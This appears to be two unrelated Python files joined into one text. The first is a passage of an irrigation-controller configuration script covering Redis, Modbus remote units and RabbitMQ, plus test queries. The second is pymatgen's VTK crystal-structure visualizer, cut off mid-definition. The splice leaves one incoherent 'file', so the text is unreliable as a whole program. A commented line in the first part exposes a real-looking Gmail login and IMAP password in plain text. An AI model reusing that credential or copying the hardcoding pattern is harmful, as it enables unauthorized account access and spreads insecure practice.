cf.add_header_node("moisture_1")
cf.add_info_node("MOISTURE_DATA", "moisture_1",properties={"queue_name":"moisture_1_data","list_length":300},json_flag = True)
cf.add_info_node("MOISTURE_AIR_TEMP_LIST", "moisture_1",properties={"queue_name":"moisture_1_list","list_length":24},json_flag = True)
cf.add_info_node("MOISTURE_ROLLOVER", "moisture_1",properties={"queue_name":"moisture_1_rollover","list_length":24},json_flag = True)
cf.end_header_node("moisture_1") #moisture_1
cf.end_header_node("MOISTURE_SENSOR_DATA") #MOISTURE_DATA
cf.end_header_node("DATA_STORE")
properties = {}
properties["ip"] = "192.168.1.84"
properties["remote_type"] = "UDP"
properties["port"] = 5005
properties["redis_host"] = "192.168.1.84"
properties["redis_db"] = 0
cf.add_header_node( "UDP_IO_SERVER","main_remote", properties = properties, json_flag= True )
properties = {}
properties["type"] = "rs485_modbus",
properties["interface_parameters"] = { "interface":None, "timeout":.05, "baud_rate":38400 }
properties["search_device"] = "satellite_1"
cf.add_header_node( "SERIAL_LINK","rtu_2", properties = properties, json_flag= True )
properties = {}
properties["modbus_address"] = 100
properties["type"] = "click_44"
properties["function"] = ["irrigation","flow_meter","plc_current","valve_current","switches"]
properties["parameters"] = { "address":100 , "search_register":0, "register_number":1 }
cf.add_info_node( "REMOTE_UNIT","satellite_1", properties = properties, json_flag= True )
properties = {}
properties["modbus_address"] = 125
properties["type"] = "click_22"
properties["function"] = ["irrigation"]
properties["parameters"] = { "address":125 , "search_register":0 ,"register_number":1 }
cf.add_info_node( "REMOTE_UNIT","satellite_2", properties = properties, json_flag= True )
properties = {}
properties["modbus_address"] = 170
properties["type"] = "click_22"
properties["function"] = ["irrigation"]
properties["parameters"] = { "address":170 , "search_register":0, "register_number":1 }
cf.add_info_node( "REMOTE_UNIT","satellite_3", properties =properties, json_flag= True )
properties = {}
properties["modbus_address"] = 40
properties["type"] = "PSOC_4_Moisture"
properties["function"] = ["moisture"]
properties["parameters"] = { "address":40 , "search_register":1,"register_number":10 }
cf.add_info_node( "REMOTE_UNIT","moisture_1", properties =properties, json_flag= True )
cf.end_header_node("SERIAL_LINK")
cf.end_header_node("UDP_IO_SERVER")
cf.add_header_node("RABBITMQ_CLIENTS")
cf.add_rabbitmq_status_queue( "LaCima",vhost="LaCima",queue="status_queue",port=5671,server = 'lacimaRanch.cloudapp.net' )
cf.end_header_node("RABBITMQ_CLIENTS")
#cf.construct_controller( name="PI_1", ip = "192.168.1.82",type="PI")
#cf.end_controller()
#cf.construct_web_server( name="main_web_server",url="https://192.168.1.84" )
#cf.add_rabbitmq_command_rpc_queue("LaCima" )
#cf.add_rabbitmq_web_rpc_queue("LaCima")
#cf.add_rabbitmq_event_queue("LaCima")
#cf.add_rabbitmq_status_queue( "LaCima",vhost="LaCima",queue="status_queue",port=5671,server = 'lacimaRanch.cloudapp.net' )
#cf.add_info_node( "CIMIS_EMAIL","CIMIS_EMAIL",properties = { "imap_username" :'lacima.ranch@gmail.com',"imap_password" : 'Gr1234gfd'} , json_flag = True)
#cf.add_ntpd_server("LaCima") #cf.add_moisture_monitoring("LaCima")
#cf.irrigation_monitoring("LaCima")
#cf.add_device_monitoring("LaCima")
#cf.add_watch_dog_monitoring("LaCima")
cf.end_site()
cf.end_system()
cf.check_namespace()
#
# Test code
#
#
#
#
keys = redis_handle.keys("*")
print ("len of keys",len(keys))
'''
for i in keys:
print( "+++++++++++++:")
print( i )
temp = i.split( common.sep)
print (len(temp))
print (redis_handle.hgetall(i))
print ("----------------")
print ("lenght",len(keys))
print ("testing query functions")
'''
#temp = qc.match_label_property( "REMOTE", "name", "satellite_1")
#print "specific_match",len(temp),"UDP_IO_SERVER","main_remote"
temp = qc.match_label_property( "UDP_IO_SERVER", "name", "main_remote")
print ("specific_match",len(temp),temp)
temp = qc.match_label_property_generic( "UDP_IO_SERVER", "name", "main_remote", "REMOTE_UNIT" )
print ("general match", len(temp) ,temp)
print (qc.match_labels( "UDP_IO_SERVER"))
temp= qc.match_label_property_specific( "UDP_IO_SERVER", "name", "main_remote", "REMOTE_UNIT", "name", "satellite_1")
print ("specific property match", len(temp))
temp = qc.match_label_property_generic( "UDP_IO_SERVER", "name", "main_remote", "REMOTE_UNIT" )
print ("general match", len(temp))
temp= qc.match_relationship_property_specific( "UDP_IO_SERVER", "name", "main_remote", "REMOTE_UNIT", "name", "satellite_1")
print ("match relationship", len(temp))
temp = qc.match_relationship_property_generic( "UDP_IO_SERVER", "name", "main_remote", "REMOTE_UNIT" )
print ("general match", len(temp))
temp = qc.match_label_property_generic( "UDP_IO_SERVER", "name", "main_remote", "REMOTE_UNIT" )
print ("general match", len(temp) ,temp)
print ("testing class functions")
graph_management = Graph_Management("PI_1","main_remote","LaCima_DataStore" )
print (len(graph_management.find_remotes_by_function( "moisture" )))
print (len(graph_management.find_remotes_by_function( "irrigation" )))
print (len(graph_management.find_remotes_by_function( "flow_meter" )))
print (len(graph_management.find_remotes_by_function( "plc_current" )))
print (len(graph_management.find_remotes_by_function( "valve_current" )))
print (len(graph_management.find_remotes_by_function( "switches" )))
print (len(graph_management.find_remotes_by_function( "not found" )))
|
|
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
"""
This module contains classes to wrap Python VTK to make nice molecular plots.
"""
import itertools
import math
import os
import subprocess
import time
import numpy as np
try:
import vtk
from vtk import vtkInteractorStyleTrackballCamera
except ImportError:
# VTK not present. The Camera is to set object to avoid errors in unittest.
vtk = None
vtkInteractorStyleTrackballCamera = object
from monty.dev import requires
from monty.serialization import loadfn
from pymatgen.core.periodic_table import Species
from pymatgen.core.sites import PeriodicSite
from pymatgen.core.structure import Structure
from pymatgen.util.coord import in_coord_list
module_dir = os.path.dirname(os.path.abspath(__file__))
EL_COLORS = loadfn(os.path.join(module_dir, "ElementColorSchemes.yaml"))
class StructureVis:
"""
Provides Structure object visualization using VTK.
"""
@requires(vtk, "Visualization requires the installation of VTK with Python bindings.")
def __init__(
self,
element_color_mapping=None,
show_unit_cell=True,
show_bonds=False,
show_polyhedron=True,
poly_radii_tol_factor=0.5,
excluded_bonding_elements=None,
):
"""
Constructs a Structure Visualization.
Args:
element_color_mapping: Optional color mapping for the elements,
as a dict of {symbol: rgb tuple}. For example, {"Fe": (255,
123,0), ....} If None is specified, a default based on
Jmol"s color scheme is used.
show_unit_cell: Set to False to not show the unit cell
boundaries. Defaults to True.
show_bonds: Set to True to show bonds. Defaults to True.
show_polyhedron: Set to True to show polyhedrons. Defaults to
False.
poly_radii_tol_factor: The polyhedron and bonding code uses the
ionic radii of the elements or species to determine if two
atoms are bonded. This specifies a tolerance scaling factor
such that atoms which are (1 + poly_radii_tol_factor) * sum
of ionic radii apart are still considered as bonded.
excluded_bonding_elements: List of atom types to exclude from
bonding determination. Defaults to an empty list. Useful
when trying to visualize a certain atom type in the
framework (e.g., Li in a Li-ion battery cathode material).
Useful keyboard shortcuts implemented.
h : Show help
A/a : Increase/decrease cell by one unit vector in a-direction
B/b : Increase/decrease cell by one unit vector in b-direction
C/c : Increase/decrease cell by one unit vector in c-direction
# : Toggle showing of polyhedrons
- : Toggle showing of bonds
[ : Decrease poly_radii_tol_factor by 0.05
] : Increase poly_radii_tol_factor by 0.05
r : Reset camera direction
o : Orthogonalize structure
Up/Down : Rotate view along Up direction by 90 clock/anticlockwise
Left/right : Rotate view along camera direction by 90
clock/anticlockwise
"""
# create a rendering window and renderer
self.ren = vtk.vtkRenderer()
self.ren_win = vtk.vtkRenderWindow()
self.ren_win.AddRenderer(self.ren)
self.ren.SetBackground(1, 1, 1)
self.title = "Structure Visualizer"
# create a renderwindowinteractor
self.iren = vtk.vtkRenderWindowInteractor()
self.iren.SetRenderWindow(self.ren_win)
self.mapper_map = {}
self.structure = None
if element_color_mapping:
self.el_color_mapping = element_color_mapping
else:
self.el_color_mapping = EL_COLORS["VESTA"]
self.show_unit_cell = show_unit_cell
self.show_bonds = show_bonds
self.show_polyhedron = show_polyhedron
self.poly_radii_tol_factor = poly_radii_tol_factor
self.excluded_bonding_elements = excluded_bonding_elements if excluded_bonding_elements else []
self.show_help = True
self.supercell = [[1, 0, 0], [0, 1, 0], [0, 0, 1]]
self.redraw()
style = StructureInteractorStyle(self)
self.iren.SetInteractorStyle(style)
self.ren.parent = self
def rotate_view(self, axis_ind=0, angle=0):
"""
Rotate the camera view.
Args:
axis_ind: Index of axis to rotate. Defaults to 0, i.e., a-axis.
angle: Angle to rotate by. Defaults to 0.
"""
camera = self.ren.GetActiveCamera()
if axis_ind == 0:
camera.Roll(angle)
elif axis_ind == 1:
camera.Azimuth(angle)
else:
camera.Pitch(angle)
self.ren_win.Render()
def write_image(self, filename="image.png", magnification=1, image_format="png"):
"""
Save render window to an image.
Arguments:
filename:
filename to save to. Defaults to image.png.
magnification:
magnification. Use it to render high res images.
image_format:
choose between jpeg, png. Png is the default.
"""
render_large = vtk.vtkRenderLargeImage()
render_large.SetInput(self.ren)
if image_format == "jpeg":
writer = vtk.vtkJPEGWriter()
writer.SetQuality(80)
else:
writer = vtk.vtkPNGWriter()
render_large.SetMagnification(magnification)
writer.SetFileName(filename)
writer.SetInputConnection(render_large.GetOutputPort())
self.ren_win.Render()
writer.Write()
del render_large
def redraw(self, reset_camera=False):
"""
Redraw the render window.
Args:
reset_camera: Set to True to reset the camera to a
pre-determined default for each structure. Defaults to False.
"""
self.ren.RemoveAllViewProps()
self.picker = None
self.add_picker_fixed()
self.helptxt_mapper = vtk.vtkTextMapper()
tprops = self.helptxt_mapper.GetTextProperty()
tprops.SetFontSize(14)
tprops.SetFontFamilyToTimes()
tprops.SetColor(0, 0, 0)
if self.structure is not None:
self.set_structure(self.structure, reset_camera)
self.ren_win.Render()
def orthongonalize_structure(self):
"""
Orthogonalize the structure.
"""
if self.structure is not None:
self.set_structure(self.structure.copy(sanitize=True))
self.ren_win.Render()
def display_help(self):
"""
Display the help for various keyboard shortcuts.
"""
helptxt = [
"h : Toggle help",
"A/a, B/b or C/c : Increase/decrease cell by one a, b or c unit vector",
"# : Toggle showing of polyhedrons",
"-: Toggle showing of bonds",
"r : Reset camera direction",
"[/]: Decrease or increase poly_radii_tol_factor by 0.05. Value = " + str(self.poly_radii_tol_factor),
"Up/Down: Rotate view along Up direction by 90 clockwise/anticlockwise",
"Left/right: Rotate view along camera direction by 90 clockwise/anticlockwise",
"s: Save view to image.png",
"o: Orthogonalize structure",
]
self.helptxt_mapper.SetInput("\n".join(helptxt))
self.helptxt_actor.SetPosition(10, 10)
self.helptxt_actor.VisibilityOn()
def set_structure(self, structure, reset_camera=True, to_unit_cell=True):
"""
Add a structure to the visualizer.
Args:
structure: structure to visualize
reset_camera: Set to True to reset the camera to a default
determined based on the structure.
to_unit_cell: Whether or not to fall back sites into the unit cell.
"""
self.ren.RemoveAllViewProps()
has_lattice = hasattr(structure, "lattice")
if has_lattice:
s = Structure.from_sites(structure, to_unit_cell=to_unit_cell)
s.make_supercell(self.supercell, to_unit_cell=to_unit_cell)
else:
s = structure
inc_coords = []
for site in s:
self.add_site(site)
inc_coords.append(site.coords)
count = 0
labels = ["a", "b", "c"]
colors = [(1, 0, 0), (0, 1, 0), (0, 0, 1)]
if has_lattice:
matrix = s.lattice.matrix
if self.show_unit_cell and has_lattice:
# matrix = s.lattice.matrix
self.add_text([0, 0, 0], "o")
for vec in matrix:
self.add_line((0, 0, 0), vec, colors[count])
self.add_text(vec, labels[count], colors[count])
count += 1
for (vec1, vec2) in itertools.permutations(matrix, 2):
self.add_line(vec1, vec1 + vec2)
for (vec1, vec2, vec3) in itertools.permutations(matrix, 3):
self.add_line(vec1 + vec2, vec1 + vec2 + vec3)
if self.show_bonds or self.show_polyhedron:
elements = sorted(s.composition.elements, key=lambda a: a.X)
anion = elements[-1]
def contains_anion(site):
for sp in site.species.keys():
if sp.symbol == anion.symbol:
return True
return False
anion_radius = anion.average_ionic_radius
for site in s:
exclude = False
max_radius = 0
color = np.array([0, 0, 0])
for sp, occu in site.species.items():
if sp.symbol in self.excluded_bonding_elements or sp == anion:
exclude = True
break
max_radius = max(max_radius, sp.average_ionic_radius)
color = color + occu * np.array(self.el_color_mapping.get(sp.symbol, [0, 0, 0]))
if not exclude:
max_radius = (1 + self.poly_radii_tol_factor) * (max_radius + anion_radius)
nn = structure.get_neighbors(site, float(max_radius))
nn_sites = []
for neighbor in nn:
if contains_anion(neighbor):
nn_sites.append(neighbor)
if not in_coord_list(inc_coords, neighbor.coords):
self.add_site(neighbor)
if self.show_bonds:
self.add_bonds(nn_sites, site)
if self.show_polyhedron:
color = [i / 255 for i in color]
self.add_polyhedron(nn_sites, site, color)
if self.show_help:
self.helptxt_actor = vtk.vtkActor2D()
self.helptxt_actor.VisibilityOn()
self.helptxt_actor.SetMapper(self.helptxt_mapper)
self.ren.AddActor(self.helptxt_actor)
self.display_help()
camera = self.ren.GetActiveCamera()
if reset_camera:
if has_lattice:
# Adjust the camera for best viewing
lengths = s.lattice.abc
pos = (matrix[1] + matrix[2]) * 0.5 + matrix[0] * max(lengths) / lengths[0] * 3.5
camera.SetPosition(pos)
camera.SetViewUp(matrix[2])
camera.SetFocalPoint((matrix[0] + matrix[1] + matrix[2]) * 0.5)
else:
origin = s.center_of_mass
max_site = max(s, key=lambda site: site.distance_from_point(origin))
camera.SetPosition(origin + 5 * (max_site.coords - origin))
camera.SetFocalPoint(s.center_of_mass)
self.structure = structure
self.title = s.composition.formula
def zoom(self, factor):
"""
Zoom the camera view by a factor.
"""
camera = self.ren.GetActiveCamera()
camera.Zoom(factor)
self.ren_win.Render()
def show(self):
"""
Display the visualizer.
"""
self.iren.Initialize()
self.ren_win.SetSize(800, 800)
self.ren_win.SetWindowName(self.title)
self.ren_win.Render()
self.iren.Start()
def add_site(self, site):
"""
Add a site to the render window. The site is displayed as a sphere, the
color of which is determined based on the element. Partially occupied
sites are displayed as a single element color, though the site info
still shows the partial occupancy.
Args:
site: Site to add.
"""
start_angle = 0
radius = 0
total_occu = 0
for specie, occu in site.species.items():
radius += occu * (
specie.ionic_radius
if isinstance(specie, Species) and specie.ionic_radius
else specie.average_ionic_radius
)
total_occu += occu
vis_radius = 0.2 + 0.002 * radius
for specie, occu in site.species.items():
if not specie:
color = (1, 1, 1)
elif specie.symbol in self.el_color_mapping:
color = [i / 255 for i in self.el_color_mapping[specie.symbol]]
mapper = self.add_partial_sphere(site.coords, vis_radius, color, start_angle, start_angle + 360 * occu)
self.mapper_map[mapper] = [site]
start_angle += 360 * occu
if total_occu < 1:
mapper = self.add_partial_sphere(
site.coords,
vis_radius,
(1, 1, 1),
start_angle,
start_angle + 360 * (1 - total_occu),
)
self.mapper_map[mapper] = [site]
def add_partial_sphere(self, coords, radius, color, start=0, end=360, opacity=1.0):
"""
Adding a partial sphere (to display partial occupancies.
Args:
coords (nd.array): Coordinates
radius (float): Radius of sphere
color (): Color of sphere.
start (float): Starting angle.
end (float): Ending angle.
opacity (float): Opacity.
"""
sphere = vtk.vtkSphereSource()
sphere.SetCenter(coords)
sphere.SetRadius(radius)
sphere.SetThetaResolution(18)
sphere.SetPhiResolution(18)
sphere.SetStartTheta(start)
sphere.SetEndTheta(end)
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(sphere.GetOutputPort())
actor = vtk.vtkActor()
actor.SetMapper(mapper)
actor.GetProperty().SetColor(color)
actor.GetProperty().SetOpacity(opacity)
self.ren.AddActor(actor)
return mapper
def add_text(self, coords, text, color=(0, 0, 0)):
"""
Add text at a coordinate.
Args:
coords: Coordinates to add text at.
text: Text to place.
color: Color for text as RGB. Defaults to black.
"""
source = vtk.vtkVectorText()
source.SetText(text)
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(source.GetOutputPort())
follower = vtk.vtkFollower()
follower.SetMapper(mapper)
follower.GetProperty().SetColor(color)
follower.SetPosition(coords)
follower.SetScale(0.5)
self.ren.AddActor(follower)
follower.SetCamera(self.ren.GetActiveCamera())
def add_line(self, start, end, color=(0.5, 0.5, 0.5), width=1):
"""
Adds a line.
Args:
start: Starting coordinates for line.
end: Ending coordinates for line.
color: Color for text as RGB. Defaults to grey.
width: Width of line. Defaults to 1.
"""
source = vtk.vtkLineSource()
source.SetPoint1(start)
source.SetPoint2(end)
vertexIDs = vtk.vtkStringArray()
vertexIDs.SetNumberOfComponents(1)
vertexIDs.SetName("VertexIDs")
# Set the vertex labels
vertexIDs.InsertNextValue("a")
vertexIDs.InsertNextValue("b")
source.GetOutput().GetPointData().AddArray(vertexIDs)
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(source.GetOutputPort())
actor = vtk.vtkActor()
actor.SetMapper(mapper)
actor.GetProperty().SetColor(color)
actor.GetProperty().SetLineWidth(width)
self.ren.AddActor(actor)
def add_polyhedron(
self,
neighbors,
center,
color,
opacity=1.0,
draw_edges=False,
edges_color=[0.0, 0.0, 0.0],
edges_linewidth=2,
):
"""
Adds a polyhedron.
Args:
neighbors: Neighbors of the polyhedron (the vertices).
center: The atom in the center of the polyhedron.
color: Color for text as RGB.
opacity: Opacity of the polyhedron
draw_edges: If set to True, the a line will be drawn at each edge
edges_color: Color of the line for the edges
edges_linewidth: Width of the line drawn for the edges
"""
points = vtk.vtkPoints()
conv = vtk.vtkConvexPointSet()
for i, n in enumerate(neighbors):
x, y, z = n.coords
points.InsertPoint(i, x, y, z)
conv.GetPointIds().InsertId(i, i)
grid = vtk.vtkUnstructuredGrid()
grid.Allocate(1, 1)
grid.InsertNextCell(conv.GetCellType(), conv.GetPointIds())
grid.SetPoints(points)
dsm = vtk.vtkDataSetMapper()
polysites = [center]
polysites.extend(neighbors)
self.mapper_map[dsm] = polysites
if vtk.VTK_MAJOR_VERSION <= 5:
dsm.SetInputConnection(grid.GetProducerPort())
else:
dsm.SetInputData(grid)
ac = vtk.vtkActor()
# ac.SetMapper(mapHull)
ac.SetMapper(dsm)
ac.GetProperty().SetOpacity(opacity)
if color == "element":
# If partial occupations are involved, the color of the specie with
# the highest occupation is used
myoccu = 0.0
for specie, occu in center.species.items():
if occu > myoccu:
myspecie = specie
myoccu = occu
color = [i / 255 for i in self.el_color_mapping[myspecie.symbol]]
ac.GetProperty().SetColor(color)
else:
ac.GetProperty().SetColor(color)
if draw_edges:
ac.GetProperty().SetEdgeColor(edges_color)
ac.GetProperty().SetLineWidth(edges_linewidth)
ac.GetProperty().EdgeVisibilityOn()
self.ren.AddActor(ac)
def add_triangle(
self,
neighbors,
color,
center=None,
opacity=0.4,
draw_edges=False,
edges_color=[0.0, 0.0, 0.0],
edges_linewidth=2,
):
"""
Adds a triangular surface between three atoms.
Args:
atoms: Atoms between which a triangle will be drawn.
color: Color for triangle as RGB.
center: The "central atom" of the triangle
opacity: opacity of the triangle
draw_edges: If set to True, the a line will be drawn at each edge
edges_color: Color of the line for the edges
edges_linewidth: Width of the line drawn for the edges
"""
points = vtk.vtkPoints()
triangle = vtk.vtkTriangle()
for ii in range(3):
points.InsertNextPoint(neighbors[ii].x, neighbors[ii].y, neighbors[ii].z)
triangle.GetPointIds().SetId(ii, ii)
triangles = vtk.vtkCellArray()
triangles.InsertNextCell(triangle)
# polydata object
trianglePolyData = vtk.vtkPolyData()
trianglePolyData.SetPoints(points)
trianglePolyData.SetPolys(triangles)
# mapper
mapper = vtk.vtkPolyDataMapper()
mapper.SetInput(trianglePolyData)
ac = vtk.vtkActor()
ac.SetMapper(mapper)
ac.GetProperty().SetOpacity(opacity)
if color == "element":
if center is None:
raise ValueError(
"Color should be chosen according to the central atom, and central atom is not provided"
)
# If partial occupations are involved, the color of the specie with
# the highest occupation is used
myoccu = 0.0
for specie, occu in center.species.items():
if occu > myoccu:
myspecie = specie
myoccu = occu
color = [i / 255 for i in self.el_color_mapping[myspecie.symbol]]
ac.GetProperty().SetColor(color)
else:
ac.GetProperty().SetColor(color)
if draw_edges:
ac.GetProperty().SetEdgeColor(edges_color)
ac.GetProperty().SetLineWidth(edges_linewidth)
ac.GetProperty().EdgeVisibilityOn()
self.ren.AddActor(ac)
def add_faces(self, faces, color, opacity=0.35):
"""
Adding face of polygon.
Args:
faces (): Coordinates of the faces.
color (): Color.
opacity (float): Opacity
"""
for face in faces:
if len(face) == 3:
points = vtk.vtkPoints()
triangle = vtk.vtkTriangle()
for ii in range(3):
points.InsertNextPoint(face[ii][0], face[ii][1], face[ii][2])
triangle.GetPointIds().SetId(ii, ii)
triangles = vtk.vtkCellArray()
triangles.InsertNextCell(triangle)
trianglePolyData = vtk.vtkPolyData()
trianglePolyData.SetPoints(points)
trianglePolyData.SetPolys(triangles)
mapper = vtk.vtkPolyDataMapper()
if vtk.VTK_MAJOR_VERSION <= 5:
mapper.SetInputConnection(trianglePolyData.GetProducerPort())
else:
mapper.SetInputData(trianglePolyData)
# mapper.SetInput(trianglePolyData)
ac = vtk.vtkActor()
ac.SetMapper(mapper)
ac.GetProperty().SetOpacity(opacity)
ac.GetProperty().SetColor(color)
self.ren.AddActor(ac)
elif len(face) > 3:
center = np.zeros(3, np.float_)
for site in face:
center += site
center /= np.float_(len(face))
for ii, f in enumerate(face):
points = vtk.vtkPoints()
triangle = vtk.vtkTriangle()
points.InsertNextPoint(f[0], f[1], f[2])
ii2 = np.mod(ii + 1, len(face))
points.InsertNextPoint(face[ii2][0], face[ii2][1], face[ii2][2])
points.InsertNextPoint(center[0], center[1], center[2])
for ii in range(3):
triangle.GetPointIds().SetId(ii, ii)
triangles = vtk.vtkCellArray()
triangles.InsertNextCell(triangle)
trianglePolyData = vtk.vtkPolyData()
trianglePolyData.SetPoints(points)
trianglePolyData.SetPolys(triangles)
mapper = vtk.vtkPolyDataMapper()
if vtk.VTK_MAJOR_VERSION <= 5:
mapper.SetInputConnection(trianglePolyData.GetProducerPort())
else:
mapper.SetInputData(trianglePolyData)
# mapper.SetInput(trianglePolyData)
ac = vtk.vtkActor()
ac.SetMapper(mapper)
ac.GetProperty().SetOpacity(opacity)
ac.GetProperty().SetColor(color)
self.ren.AddActor(ac)
else:
raise ValueError("Number of points for a face should be >= 3")
def add_edges(self, edges, type="line", linewidth=2, color=[0.0, 0.0, 0.0]):
"""
Args:
edges (): List of edges
type ():
linewidth (): Width of line
color (nd.array/tuple): RGB color.
"""
points = vtk.vtkPoints()
lines = vtk.vtkCellArray()
for iedge, edge in enumerate(edges):
points.InsertPoint(2 * iedge, edge[0])
points.InsertPoint(2 * iedge + 1, edge[1])
lines.InsertNextCell(2)
lines.InsertCellPoint(2 * iedge)
lines.InsertCellPoint(2 * iedge + 1)
polydata = vtk.vtkPolyData()
polydata.SetPoints(points)
polydata.SetLines(lines)
mapper = vtk.vtkPolyDataMapper()
if vtk.VTK_MAJOR_VERSION <= 5:
mapper.SetInputConnection(polydata.GetProducerPort())
else:
mapper.SetInputData(polydata)
# mapper.SetInput(polydata)
ac = vtk.vtkActor()
ac.SetMapper(mapper)
ac.GetProperty().SetColor(color)
ac.GetProperty().SetLineWidth(linewidth)
self.ren.AddActor(ac)
def add_bonds(self, neighbors, center, color=None, opacity=None, radius=0.1):
"""
Adds bonds for a site.
Args:
neighbors: Neighbors of the site.
center: The site in the center for all bonds.
color: Color of the tubes representing the bonds
opacity: Opacity of the tubes representing the bonds
radius: Radius of tube s representing the bonds
"""
points = vtk.vtkPoints()
points.InsertPoint(0, center.x, center.y, center.z)
n = len(neighbors)
lines = vtk.vtkCellArray()
for i in range(n):
points.InsertPoint(i + 1, neighbors[i].coords)
lines.InsertNextCell(2)
lines.InsertCellPoint(0)
lines.InsertCellPoint(i + 1)
pd = vtk.vtkPolyData()
pd.SetPoints(points)
pd.SetLines(lines)
tube = vtk.vtkTubeFilter()
if vtk.VTK_MAJOR_VERSION <= 5:
tube.SetInputConnection(pd.GetProducerPort())
else:
tube.SetInputData(pd)
tube.SetRadius(radius)
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(tube.GetOutputPort())
actor = vtk.vtkActor()
actor.SetMapper(mapper)
if opacity is not None:
actor.GetProperty().SetOpacity(opacity)
if color is not None:
actor.GetProperty().SetColor(color)
self.ren.AddActor(actor)
def add_picker_fixed(self):
"""
Create a cell picker.Returns:
"""
picker = vtk.vtkCellPicker()
# Create a Python function to create the text for the text mapper used
# to display the results of picking.
def annotate_pick(obj, event):
if picker.GetCellId() < 0 and not self.show_help:
self.helptxt_actor.VisibilityOff()
else:
mapper = picker.GetMapper()
if mapper in self.mapper_map:
output = []
for site in self.mapper_map[mapper]:
row = [
f"{site.species_string} - ",
", ".join([f"{c:.3f}" for c in site.frac_coords]),
"[" + ", ".join([f"{c:.3f}" for c in site.coords]) + "]",
]
output.append("".join(row))
self.helptxt_mapper.SetInput("\n".join(output))
self.helptxt_actor.SetPosition(10, 10)
self.helptxt_actor.VisibilityOn()
self.show_help = False
self.picker = picker
picker.AddObserver("EndPickEvent", annotate_pick)
self.iren.SetPicker(picker)
def add_picker(self):
"""
Create a cell picker.
"""
picker = vtk.vtkCellPicker()
# Create a Python function to create the text for the text mapper used
# to display the results of picking.
source = vtk.vtkVectorText()
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(source.GetOutputPort())
follower = vtk.vtkFollower()
follower.SetMapper(mapper)
follower.GetProperty().SetColor((0, 0, 0))
follower.SetScale(0.2)
self.ren.AddActor(follower)
follower.SetCamera(self.ren.GetActiveCamera())
follower.VisibilityOff()
def annotate_pick(obj, event):
if picker.GetCellId() < 0:
follower.VisibilityOff()
else:
pick_pos = picker.GetPickPosition()
mapper = picker.GetMapper()
if mapper in self.mapper_map:
site = self.mapper_map[mapper]
output = [
site.species_string,
"Frac. coords: " + " ".join([f"{c:.4f}" for c in site.frac_coords]),
]
source.SetText("\n".join(output))
follower.SetPosition(pick_pos)
follower.VisibilityOn()
picker.AddObserver("EndPickEvent", annotate_pick)
self.picker = picker
self.iren.SetPicker(picker)
class StructureInteractorStyle(vtkInteractorStyleTrackballCamera):
"""
A custom interactor style for visualizing structures.
"""
def __init__(self, parent):
"""
Args:
parent ():
"""
self.parent = parent
self.AddObserver("LeftButtonPressEvent", self.leftButtonPressEvent)
self.AddObserver("MouseMoveEvent", self.mouseMoveEvent)
self.AddObserver("LeftButtonReleaseEvent", self.leftButtonReleaseEvent)
self.AddObserver("KeyPressEvent", self.keyPressEvent)
def leftButtonPressEvent(self, obj, event):
"""
Args:
obj ():
event ():
"""
self.mouse_motion = 0
self.OnLeftButtonDown()
def mouseMoveEvent(self, obj, event):
"""
Args:
obj ():
event ():
"""
self.mouse_motion = 1
self.OnMouseMove()
def leftButtonReleaseEvent(self, obj, event):
"""
Args:
obj ():
event ():
"""
ren = obj.GetCurrentRenderer()
iren = ren.GetRenderWindow().GetInteractor()
if self.mouse_motion == 0:
pos = iren.GetEventPosition()
iren.GetPicker().Pick(pos[0], pos[1], 0, ren)
self.OnLeftButtonUp()
def keyPressEvent(self, obj, event):
"""
Args:
obj ():
event ():
"""
parent = obj.GetCurrentRenderer().parent
sym = parent.iren.GetKeySym()
if sym in "ABCabc":
if sym == "A":
parent.supercell[0][0] += 1
elif sym == "B":
parent.supercell[1][1] += 1
elif sym == "C":
parent.supercell[2][2] += 1
elif sym == "a":
parent.supercell[0][0] = max(parent.supercell[0][0] - 1, 1)
elif sym == "b":
parent.supercell[1][1] = max(parent.supercell[1][1] - 1, 1)
elif sym == "c":
parent.supercell[2][2] = max(parent.supercell[2][2] - 1, 1)
parent.redraw()
elif sym == "numbersign":
parent.show_polyhedron = not parent.show_polyhedron
parent.redraw()
elif sym == "minus":
parent.show_bonds = not parent.show_bonds
parent.redraw()
elif sym == "bracketleft":
parent.poly_radii_tol_factor -= 0.05 if parent.poly_radii_tol_factor > 0 else 0
parent.redraw()
elif sym == "bracketright":
parent.poly_radii_tol_factor += 0.05
parent.redraw()
elif sym == "h":
parent.show_help = not parent.show_help
parent.redraw()
elif sym == "r":
parent.redraw(True)
elif sym == "s":
parent.write_image("image.png")
elif sym == "Up":
parent.rotate_view(1, 90)
elif sym == "Down":
parent.rotate_view(1, -90)
elif sym == "Left":
parent.rotate_view(0, -90)
elif sym == "Right":
parent.rotate_view(0, 90)
elif sym == "o":
parent.orthongonalize_structure()
parent.redraw()
self.OnKeyPress()
def make_movie(structures, output_filename="movie.mp4", zoom=1.0, fps=20, bitrate="10000k", quality=1, **kwargs):
r"""
Generate a movie from a sequence of structures using vtk and ffmpeg.
Args:
structures ([Structure]): sequence of structures
output_filename (str): filename for structure output. defaults to
movie.mp4
zoom (float): A zoom to be applied to the visualizer. Defaults to 1.0.
fps (int): Frames per second for the movie. Defaults to 20.
bitrate (str): Video bitate. Defaults to "10000k" (fairly high
quality).
quality (int): A quality scale. Defaults to 1.
\\*\\*kwargs: Any kwargs supported by StructureVis to modify the images
generated.
"""
vis = StructureVis(**kwargs)
vis.show_help = False
vis.redraw()
vis.zoom(zoom)
sigfig = int(math.floor(math.log10(len(structures))) + 1)
filename = "image{0:0" + str(sigfig) + "d}.png"
for i, s in enumerate(structures):
vis.set_structure(s)
vis.write_image(filename.format(i), 3)
filename = "image%0" + str(sigfig) + "d.png"
args = [
"ffmpeg",
"-y",
"-i",
filename,
"-q:v",
str(quality),
"-r",
str(fps),
"-b:v",
str(bitrate),
output_filename,
]
with subprocess.Popen(args) as p:
p.communicate()
class MultiStructuresVis(StructureVis):
"""
Visualization for multiple structures.
"""
DEFAULT_ANIMATED_MOVIE_OPTIONS = {
"time_between_frames": 0.1,
"looping_type": "restart",
"number_of_loops": 1,
"time_between_loops": 1.0,
}
def __init__(
self,
element_color_mapping=None,
show_unit_cell=True,
show_bonds=False,
show_polyhedron=False,
poly_radii_tol_factor=0.5,
excluded_bonding_elements=None,
animated_movie_options=DEFAULT_ANIMATED_MOVIE_OPTIONS,
):
